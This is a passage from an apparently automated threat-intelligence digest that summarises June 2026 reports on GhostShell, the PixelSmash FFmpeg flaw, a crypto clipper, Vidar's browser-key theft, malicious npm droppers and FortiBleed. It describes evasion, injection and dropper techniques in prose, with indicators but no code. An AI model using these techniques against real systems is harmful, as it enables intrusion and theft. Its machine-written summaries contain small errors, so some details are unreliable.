curl, nginx 🔢Algorithms: ecdh, sha256, ecdsa, base64, xor, aes-256-gcm, aes-256-cbc, md5, gzip 🔠Functions: GetComputerName, GetUserName, CreateFile, GetTempPath 🗂️Win API: VirtualAlloc, VirtualProtect, LoadLibrary, GetProcAddress, WinHttpSetOption, GdiplusStartup, GetDC, CreateCompatibleBitmap, BitBlt, CreateProcess, ... ⚙️Win Services: bits 📜Programming Languages: visual_basic, python, golang 💻Platforms: x64 #threatreport: The GhostShell malware campaign, labeled as MB-0009, has been observed targeting Ukraine's UAV operations and defense supply chain since February 2026. This new threat actor has not been correlated with previously known groups, differentiating its activities through a specific attack infrastructure and methodology. The malware exploits vulnerabilities CVE-2025-8088 and CVE-2025-6218 to deliver malicious payloads disguised in a RAR archive named “Besomar_documentation.rar,” which mimics legitimate documentation associated with the Ukrainian drone manufacturer Besomar. The targeted entities include military units and various defense-sector personnel, indicating a focus on operational access and supply chain intelligence. The primary components of the malware's architecture involve a multi-stage infection process. The RAR archive drops a Visual Basic Script (VBS) file into the Windows Startup folder, ensuring persistence through the use of relative path traversal. This VBS file subsequently downloads additional executables—122.exe and update.exe—from a command and control (C2) domain, cloudaxis.cc. The behavior of these payloads points to sophisticated evasion techniques, including checks for sandboxes and the use of mutual TLS (mTLS) for secure communication with the C2 server, which only responds to clients that present a valid client certificate. The executable 122.exe functions as a loader utilizing a CRPT XOR overlay mechanism, capable of executing a second-stage implant directly in memory. The second-stage implant authenticates via an embedded elliptic-curve mTLS client certificate, highlighting the sophisticated use of cryptography within the attack. Conversely, update.exe acts as an in-memory loader that masquerades as a Windows service while performing anti-analysis checks and fetching payloads from the C2 infrastructure. This loader retrieves subsequent shellcode and executes it in memory, effectively evading traditional detection mechanisms. Additionally, another component, 22.exe, has been identified within this operation. It is characterized as a multi-stage launcher that utilizes AES-256-GCM encryption for configuration parameters and operates as a covert transport and proxy layer using an embedded Xray Core client. More significantly, it delivers Vidar v2, a well-known information stealer, which targets a range of sensitive user information—browser passwords, cookies, and cryptocurrency-related data—via the established proxy tunnel. The overall structure of this malware campaign demonstrates a strategic approach to targeting high-value supply chain vulnerabilities critical to Ukraine's defense capabilities. With its emphasis on covert operation and data exfiltration, GhostShell poses a significant threat, especially given its potential connections to the geopolitical landscape surrounding the Ukraine conflict. The reported use of Telegram for C2 host resolution further illustrates the flexibility and adaptability of modern cyber threat actor methodologies, complicating traditional attribution efforts, though the presence of specific identifiers, such as the self-named "GhostShell Implant CA," could provide future avenues for analysis and detection.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): windows: 1, schema: 1, chats: 2

#threatreport #LowCompleteness PixelSmash – Critical FFmpeg Vulnerability Turns Media Files into Weapons | 23-06-2026 Source: jfrog.com/blog/pixelsmas… Key details below ↓ 💀Threats: Pixelsmash_vuln, Supply_chain_technique, Lumma_stealer, 🎯Victims: Media processing applications, Media servers, Cloud storage platforms, Cloud transcoding services, Chat platforms, Network attached storage appliances, Smart televisions, Photo management platforms, Artificial intelligence and machine learning infrastructure, Linux desktop environments, ... 🏭Industry: Iot, Media 🔓CVEs: CVE-2026-8461 \[[Vulners](vulners.com/cve/CVE-2026-8…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: Unknown 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1036, T1059.004, T1190, T1203, T1204.002, T1499.004 🧨IOCs: - File: 5 💽Software: MagicYUV, Linux, Jellyfin, Slack, Discord, Telegram, Ubuntu, Debian, Fedora, Alpine, ... 🔠Functions: system, free #threatreport: A critical vulnerability has been identified in FFmpeg's MagicYUV decoder, designated CVE-2026-8461, which allows for remote code execution through specially crafted media files. This vulnerability results from a heap out-of-bounds write, with a CVSS score of 8.8, and affects numerous applications utilizing FFmpeg, including media processors like Kodi, Jellyfin, and Nextcloud. The issue can be triggered by merely processing a maliciously designed AVI, MKV, or MOV file, leading to crashes of affected applications and, in some cases, to full remote code execution. To exploit the vulnerability, an attacker must deliver a carefully crafted media file to any software that decodes video using FFmpeg’s libavcodec. This can occur through desktop applications when a user opens a malicious file or when a file is uploaded to a media server, where automatic processing would trigger the vulnerability. Notably, the attack does not require any advanced permissions or user interactions beyond the initial file delivery, making it highly dangerous and exploitable through various means, including torrent downloads that automatically place files in watched directories. The underlying cause of the vulnerability can be traced back to a rounding mismatch within the MagicYUV decoder's slice handling code. The error lies in improper validation of slice height, allowing attackers to manipulate buffer memory. The implications are serious, resulting not only in application crashes but potentially in arbitrary command execution, demonstrated through successful exploits on Jellyfin, where an attacker gained execution rights through normal media library scanning routines. The impact of PixelSmash extends widely due to FFmpeg's pervasive integration into applications across the software ecosystem, making it a supply chain vulnerability. Since FFmpeg's libavcodec is a core dependency for numerous projects, many developers do not conduct thorough audits of its codec implementations, leading to silent propagation of this critical flaw into various downstream applications. Real-world exploitation scenarios also illustrate the ease with which attackers can leverage the vulnerability. The automatic metadata extraction during media uploads to services like Nextcloud and Jellyfin, combined with how damage is executed without alerting administrators, poses significant operational risks. Systems running ongoing FFmpeg services could remain compromised without indication, allowing for potential cost-inefficient exploitation in cloud environments due to the nature of the attack. Additionally, new attack surfaces emerge in AI/ML infrastructures that process video inputs, suggesting further research into similar vulnerabilities in systems employing libavcodec for untrusted video data. It is imperative for systems that rely on FFmpeg to promptly update to patched versions or disable the vulnerable MagicYUV decoder to mitigate associated risks. This incident highlights the necessity for organizations to scrutinize their software supply chains for vulnerabilities lurking within dependencies, which can manifest severe security ramifications without direct developer involvement.

#threatreport #MediumCompleteness Crypto Clipper uses Tor and worm-like propagation for persistence and control | 18-06-2026 Source: microsoft.com/en-us/security… Key details below ↓ 💀Threats: Cryptobandits, Pyarmor_tool, Contebrew, 🎯Victims: Cryptocurrency users, Organizations, End users 📚TTPs: ⚔️Tactics: 7 🛠️Technics: 8 🧨IOCs: - File: 3 - Hash: 16 💽Software: Microsoft Defender, Microsoft Defender for Endpoint, Curl, PyInstaller, Task Scheduler 📲Wallets: tron 🪙Crypto: ethereum, bitcoin, monero 🔢Algorithms: sha256 📜Programming Languages: powershell, jscript, php, python, javascript #threatreport: A newly identified cryptocurrency clipper malware has been active since February 2026, exploiting Windows environments to conduct clipboard theft, screen capture, and cryptocurrency address substitution. This malware, referred to as a crypto clipper, operates without traditional installation methods and utilizes a Windows Script Host along with ActiveX to activate a bundled Tor client for command and control (C2) communications. Notably, it avoids using static IP infrastructure, opting instead for a more discreet Tor-based method. The malware employs a two-component architecture: a worm that ensures its propagation by creating malicious shortcuts of legitimate files on compromised devices and a clipper component that targets cryptocurrency-related data. The worm's ability to generate malicious shortcuts linked to executable payloads facilitates stealthy infection processes while maintaining resilience against detection, especially through Microsoft Defender. Upon execution, the first stage of the clipper checks for running processes to evade execution within an environment that exhibits analysis tools, such as Task Manager. Following successful checks, it establishes communication with a hidden C2 server via a local Tor proxy, polling for instructions and continuously monitoring the clipboard for cryptocurrency wallet addresses and sensitive information, including seed phrases and private keys. Defensively, the malware employs a multi-layered obfuscation strategy that complicates static analysis, using techniques such as Python-based obfuscation and encrypted components decrypted only at runtime. The operation minimizes visibility into its actions by routing traffic through localhost, obscuring the final destination, and enhancing anonymity for the attackers. Command and control is facilitated through a local interface that allows the malware to receive and execute commands. Among its notable actions, it specifically captures clipboard data related to cryptocurrencies, applying custom rules to replace legitimate addresses copied by users with those under the control of the attackers. The malware also captures screenshots at regular intervals, providing further context for the threat actor concerning the user's activities. The clipper's inherent persistence mechanisms involve creating scheduled tasks to ensure both the worm and stealer components remain operational even after system reboots. Key behaviors of this malware include clipboard monitoring and exploitation of symbolic links, further complicating detection efforts. Organizations aiming to mitigate threats of this nature should focus on tightening script execution policies, monitoring traffic for misuse of local SOCKS proxies, and employing behavioral analysis to link suspicious script activities to potential exfiltration or infiltration signs. The combination of these approaches offers a proactive path to identifying and thwarting similar lightweight, yet impactful threats in real-time.

#threatreport #LowCompleteness Inside Vidar’s ABE Bypass: From Memory Scanning to APC Injections | 18-06-2026 Source: gendigital.com/blog/insights/… Key details below ↓ 💀Threats: Vidar_stealer, Remus, Lumma_stealer, Voidstealer, Apc_injection_technique, 🎯Victims: Web browsers 🤖LLM extracted TTPs:` T1055.004, T1057, T1106, T1518.001, T1555.003 🧨IOCs: - File: 1 - Hash: 1 💽Software: Chromium 🔢Algorithms: aes-256-gcm 🔠Functions: APC 🗂️Win API: CryptProtectData, CryptProtectMemory, CryptUnprotectMemory, NtCreateProcessEx, OpenProcess, CreateDesktopA, NtQueryVirtualMemory, NtReadVirtualMemory, CreateRemoteThread, NtTestAlert, ... #threatreport: Vidar, an actively developed information-stealer, has introduced innovative techniques to bypass Application-Bound Encryption (ABE), particularly aimed at extracting the v20_master_key from browser memory. This key is crucial for decrypting any ABE-protected data associated with specific applications. Vidar's method parallels techniques used by other malware, but it achieves its goals through a unique process. Instead of seeking the key from the disk—where it is protected by multiple layers of encryption—Vidar targets the browser's memory. The process begins by identifying the target browser, which Vidar can do from an already running instance or by creating a new one. It forks the existing browser process without directly reading its memory, instead capturing a static snapshot via `NtCreateProcessEx`. If the target browser is not running, Vidar initiates a new browser session on an isolated desktop, implementing specific command-line arguments to optimize conditions for its tactics. Following this, Vidar enumerates the memory of the forked process, using `NtQueryVirtualMemory`, to identify relevant memory regions fitting its criteria (committed, private, and either readable or read-write). Vidar employs a distinctive pattern search for the encrypted v20_master_key using a predefined 32-byte signature, targeting internal node structures, specifically within the Chromium's Encryptor::KeyRing framework. Upon locating potential candidates for the key, the malware must overcome the challenge that the decryption of the key can only occur within the browser's context due to CryptProtectMemory protections. To facilitate this, Vidar uses Asynchronous Procedure Calls (APC) to inject code into the live browser process. The choice of injection method is contingent upon the presence of certain antivirus products, such as ESET or Bitdefender. If either of these is detected, Vidar uses a classic approach to queue an APC after creating a suspended thread. If not detected, it employs a special method leveraging existing threads to execute an APC immediately without requiring the thread to be in an alertable state. When the APC executes, `CryptUnprotectMemory` decrypts the key in place. Vidar verifies successful decryption by forking the browser process again and comparing values before and after the APC call. It then attempts to use the decrypted key to authenticate entries by scanning for the byte sequence characteristic of ABE data. If the key successfully decrypts data entries, Vidar preserves the updated state of the key in memory using `CryptProtectMemory`. Conversely, if decryption fails across attempts, it terminates and restarts the browser before repeating the entire process. Through its use of APC injections, which can be seen as less common and potentially stealthy, Vidar seeks to trade off traditional detection methods, continuously evolving its strategies to bypass ABE defenses and maintain its efficacy as an infostealer.

#threatreport #MediumCompleteness Five npm Packages That Hide a Windows Binary Dropper | 17-06-2026 Source: safedep.io/procwire-npm-w… Key details below ↓ 💀Threats: Bitsadmin_tool, Motw_bypass_technique, Lolbin_technique, 🎯Victims: Software supply chain, Windows users 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1027, T1036, T1036.005, T1059.001, T1059.003, T1059.007, T1082, T1105, T1140, T1195.001, ... 🧨IOCs: - File: 13 - Url: 3 - Email: 2 - Path: 1 - Command: 3 - Domain: 1 💽Software: Node.js, curl 🔢Algorithms: xor 🔠Functions: createServer 📜Programming Languages: powershell #threatreport: A recent cybersecurity analysis unveiled a sophisticated attack campaign utilizing five npm packages to deploy a Windows binary dropper. Launched on June 16, 2026, the campaign involved two weaponized packages: procwire@1.3.0, which functions as a Windows binary dropper, and routecraft@4.2.0, posing as an Express clone that incorporates procwire on Windows systems. The remaining three packages serve as tools for the operator, including bytecraft (a XOR utility), endpointmap (which encodes command-and-control [C2] URLs), and staticlayer (a server-side component for the dropper). The attacker compartmentalized the malicious operations across the packages in a way that allows each to appear harmless when analyzed individually. The exploitation begins with a preinstall hook in procwire, which executes during an npm install. This hook decodes a C2 endpoint stored as XOR-encoded byte arrays in the endpointmap package, subsequently downloading and executing a payload unnoticed. The attack specifically targets Windows systems, halting its execution on other platforms. The malware employs multiple methods for arbitrary binary execution on Windows hosts during the npm installation process. Notably, it utilizes three distinct download techniques (Node.js HTTPS, curl.exe, bitsadmin) and three execution methods (direct spawn, cmd.exe, PowerShell). This flexibility enhances its resilience against partial system hardening measures, including Mark-of-the-Web protections designed to suppress Windows SmartScreen alerts for downloaded executables. The payloads masquerade under names associated with legitimate software updates like msedge_update and chrome_installer. Each npm package carries a convincing description, allowing them to blend seamlessly into the npm ecosystem: procwire is described as a lifecycle and IPC library, while bytecraft is presented as a buffer transformation library. The complexity of execution is heightened by the manner in which the C2 URL is constructed, employing XOR encryption and relying on the package name as a secret key. The dropper's construction obscures its functionality from static analysis, intentionally avoiding the use of easily detectable strings. It first attempts to retrieve the payload via an HTTP GET request while pretending to be a Microsoft delivery mechanism and disabling TLS verification to avoid detection. In the event of failure, fallback methods such as curl.exe and bitsadmin ensure that the download proceeds regardless of defenses. Furthermore, it employs a fake Zone.Identifier alternate data stream to bypass SmartScreen warnings. The staticlayer package complements the dropper, operating as a server to serve the payloads but requiring a client that mimics the dropper's User-Agent. This self-hosting capability limits exposure while allowing for efficient distribution of the malicious payload. In summary, this campaign demonstrates advanced evasion tactics by separating malicious functionalities into inconspicuous components. The analysis highlights the importance of monitoring installation behaviors rather than relying solely on package reputations, as these techniques effectively shield the campaign from conventional detection methods.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): schema: 1, table: 1, windows: 1, code: 5, chart: 3, chats: 1, dump: 1

#threatreport #MediumCompleteness Inside the FortiBleed Open Directory: A Technical Analysis of What the Attacker Left Behind | 19-06-2026 Source: cloudsek.com/blog/inside-th… Key details below ↓ 🧑‍💻Actors/Campaigns: Fortibleed 💀Threats: Impacket_tool, Password_spray_technique, Credential_harvesting_technique, 🎯Victims: Telecommunications, Internet service providers, Organisations running exposed fortios management interfaces 🏭Industry: Telco 🌐Geo: Mexico, Taiwan, India, Turkey, Asia, Colombia, United states 🤖LLM extracted TTPs:` T1040, T1078, T1087.002, T1110, T1110.002, T1110.003, T1110.004, T1133, T1135, T1552, ... 🧨IOCs: - File: 11 - IP: 9 💽Software: Telegram, Active Directory 🔢Algorithms: sha256, pbkdf2 #threatreport: FortiBleed is an extensive credential-compromise campaign actively targeting Fortinet FortiGate firewalls and SSL VPN gateways on the internet. It is characterized not as a software vulnerability or a zero-day exploit but as the result of a database compiled by a threat actor through credential reuse, brute force attacks, and offline hash cracking against exposed devices. The evidence left by attackers includes various scripts and tools categorized into distinct operational layers. Layer 1 consists of credential data gathered from device configuration exports via exposed management interfaces, containing legacy salted-SHA256 and newer PBKDF2 format hashes that identify firewall administrators. However, attribution based on FordiGuard license registration emails is problematic, as many high-profile credentials link to contractors or subsidiaries rather than the corporations themselves. Layer 2 involves advanced credential capture techniques like Kerberos pre-authentication data acquired through network sniffing after network pivoting, which reveals internal Active Directory domain names from the victim's infrastructure. The operational toolkit indicates the campaign's capability to extend beyond the firewall itself, utilizing tools such as ad_enum.py for enumerating Active Directory over LDAP and conducting password spraying against internal domain controllers with scripts like spray_admin.sh. The reported cracking power was linked to a modest configuration of rented GPU instances rather than a dedicated cluster, revealing a potential underestimation of the campaign’s resources. The dataset, termed targets_300M_plus.txt, ranks SSH and VPN endpoints by revenue, confirming that the attackers had usable access rather than merely cracked password lists. While the attackers’ origins remain difficult to pin down, some linguistic clues in their tooling hint at Russian influence, though numerous named passwords suggest connections to Persian regions as well. Regarding the extent of the compromise, India has the highest number of affected devices, followed by the United States and Taiwan. Despite the reported presence of approximately 21,000 compromised domains, most belong to internal network names that are not externally traceable, thus over-reporting the actual compromised organizations. The mix of public and non-routable domain entries suggests a wide-reaching campaign that indiscriminately scanned for exposed Fortinet products without specific targeting. Given the operation's sophistication, organizations with exposed FortiOS management interfaces are advised to treat their credentials as compromised. Recommended mitigation strategies include removing public exposure of the management interfaces, rotating administrator and VPN credentials, enforcing multi-factor authentication, and ensuring that devices are updated to the latest FortiOS, thereby securing the integrity of access control systems. Additionally, organizations should audit for backdoor accounts and unusual login patterns, replacing devices when signs of compromise are evident.